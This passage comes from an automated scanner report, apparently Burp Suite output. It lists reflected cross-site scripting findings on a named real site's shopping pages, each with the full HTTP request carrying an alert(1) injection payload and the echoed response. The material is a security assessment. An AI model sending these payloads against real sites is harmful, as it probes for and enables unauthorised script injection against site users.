Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:53:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Equipment-Gadgets801e4'-alert(1)-'6a9e89cfa94/339412286/Musical-Instruments/24';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.960. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1591d<script>alert(1)</script>2f814d77927 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Equipment-Gadgets1591d<script>alert(1)</script>2f814d77927/339412286/Musical-Instruments/24 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:54:32 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Equipment Gadgets1591d<script>alert(1)</script>2f814d77927 <a href="#" id="backlink">
...[SNIP]...

4.961. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7a9b'-alert(1)-'201bdf3a8f7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Equipment-Gadgets/339412286c7a9b'-alert(1)-'201bdf3a8f7/Musical-Instruments/24 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:58:34 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Equipment-Gadgets/339412286c7a9b'-alert(1)-'201bdf3a8f7/Musical-Instruments/24';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.962. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b07bc'-alert(1)-'9eff71d71b3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Equipment-Gadgets/339412286/Musical-Instrumentsb07bc'-alert(1)-'9eff71d71b3/24 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:05:59 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Equipment-Gadgets/339412286/Musical-Instrumentsb07bc'-alert(1)-'9eff71d71b3/24';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.963. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7d43'-alert(1)-'d0a31ab47d6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24f7d43'-alert(1)-'d0a31ab47d6 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:14:18 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24f7d43'-alert(1)-'d0a31ab47d6';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.964. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Stationery/64 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Stationery/64

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64df5"><a>b0140b06081 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping64df5"><a>b0140b06081/Equipment-Gadgets/339412286/Stationery/64 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:53:40 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping64df5"><a>b0140b06081">
...[SNIP]...

4.965. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Stationery/64 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Stationery/64

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b5f7'-alert(1)-'3728ef0c51a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping4b5f7'-alert(1)-'3728ef0c51a/Equipment-Gadgets/339412286/Stationery/64 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:00:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping4b5f7'-alert(1)-'3728ef0c51a/Equipment-Gadgets/339412286/Stationery/64';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.966. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Stationery/64 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Stationery/64

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 28afb<script>alert(1)</script>a7f04d8fbe5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Equipment-Gadgets28afb<script>alert(1)</script>a7f04d8fbe5/339412286/Stationery/64 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:05:35 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Equipment Gadgets28afb<script>alert(1)</script>a7f04d8fbe5 <a href="#" id="backlink">
...[SNIP]...

4.967. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Stationery/64 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Stationery/64

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d129a'-alert(1)-'090fd3b749c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Equipment-Gadgetsd129a'-alert(1)-'090fd3b749c/339412286/Stationery/64 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:05:18 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Equipment-Gadgetsd129a'-alert(1)-'090fd3b749c/339412286/Stationery/64';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.968. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Stationery/64 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Stationery/64

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65c91'-alert(1)-'1a2b3466890 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Equipment-Gadgets/33941228665c91'-alert(1)-'1a2b3466890/Stationery/64 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:13:12 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Equipment-Gadgets/33941228665c91'-alert(1)-'1a2b3466890/Stationery/64';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.969. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Stationery/64 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Stationery/64

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5da2d'-alert(1)-'b38aa5a5835 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Equipment-Gadgets/339412286/Stationery5da2d'-alert(1)-'b38aa5a5835/64 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:19:50 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Equipment-Gadgets/339412286/Stationery5da2d'-alert(1)-'b38aa5a5835/64';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.970. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Stationery/64 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Stationery/64

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e9c7'-alert(1)-'1bbc135ed4c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Equipment-Gadgets/339412286/Stationery/643e9c7'-alert(1)-'1bbc135ed4c HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:25:24 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Equipment-Gadgets/339412286/Stationery/643e9c7'-alert(1)-'1bbc135ed4c';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.971. http://www.beirut.com/Shopping/Home-Furnishings/4120758082 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8746d'-alert(1)-'39fe49f3abb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping8746d'-alert(1)-'39fe49f3abb/Home-Furnishings/4120758082 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:38:37 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping8746d'-alert(1)-'39fe49f3abb/Home-Furnishings';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.972. http://www.beirut.com/Shopping/Home-Furnishings/4120758082 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d794"><a>5692be18d18 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

